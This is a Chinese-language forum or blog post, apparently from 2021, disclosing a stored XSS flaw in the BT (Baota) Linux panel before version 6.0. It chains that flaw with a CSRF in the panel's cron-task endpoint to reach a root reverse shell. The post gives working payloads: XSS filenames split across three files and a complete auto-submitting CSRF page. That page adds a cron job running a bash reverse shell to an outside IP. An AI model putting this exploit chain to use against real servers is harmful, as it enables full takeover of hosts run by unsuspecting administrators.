|
|
宝塔linux面板 <6.0 存储形xss 0day漏洞原创 kkk mr [url=]漏洞推送[/url] 4天前
收录于话题
#Web渗透
3个
去年就挖到了,交了CVND。感觉现在用5.x版本的已经很少了。
通过以下命令来安装5.9版本宝塔面板
Centos安装命令:
yum install -y wget && wget -O install.sh http://download.bt.cn/install/install.sh && sh install.sh
Ubuntu/Deepin安装命令:
wget -O install.sh http://download.bt.cn/install/install-ubuntu.sh && sudo bash install.sh
假设我们已经通过网站漏洞或者ftp弱口令等,可以在web目录下进行文件上传
在web目录下上传一个文件名为 <img src=x>的文件
在宝塔后台浏览文件,触发payload
但是由于宝塔的session加了httponly,所以我们是无法获取到宝塔的cookie的,但是我们可以配合计划任务的一个csrf的漏洞来达到权限提升的效果
POC
- <html>
- <!-- CSRF PoC - generated by Burp Suite Professional -->
- <body>
- <script>history.pushState('', '', '/')</script>
- <form action="http://1.1.1.1:8888/crontab?action=AddCrontab" method="POST">
- <input type="hidden" name="name" value="test" />
- <input type="hidden" name="type" value="minute-n" />
- <input type="hidden" name="where1" value="5" />
- <input type="hidden" name="hour" value="" />
- <input type="hidden" name="minute" value="" />
- <input type="hidden" name="week" value="" />
- <input type="hidden" name="sType" value="toShell" />
- <input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
- <input type="hidden" name="sName" value="" />
- <input type="hidden" name="backupTo" value="localhost" />
- <input type="hidden" name="urladdress" value="" />
- <input type="hidden" name="save" value="" />
- <input type="hidden" name="sBody" value="bash -i >& /dev/tcp/1.1.1.1/1998 0>&1" />
- <input type="hidden" name="urladdress" value="" />
- <input type="submit" id="a" value="Submit request" />
- </form>
- </body>
- <script>
- document.getElementById('a').click()
- </script>
- </html>
后台会自动添加反弹shell的计划任务
现在准备就绪,只要让管理员打开这个网页就可以了
回到上传文件的地方,因为有触发点有字符数限制,所以用多个语句构造,因为执行顺序的关系,可能需要刷新一下文件管理即可触发
新建三个文件,文件名分别为
- a<img src=x onerror="a=String.fromCharCode(47)">
- b<img src=x onerror="b='.com'">
- c<img src=x onerror="window.open(a+a+'test'+b)">
将上一步CSRF的payload部署到test.com,管理员浏览文件的时候即可触发,触发后五分钟会反弹shell
root权限~
|
|
发表于 2021-6-29 17:22:14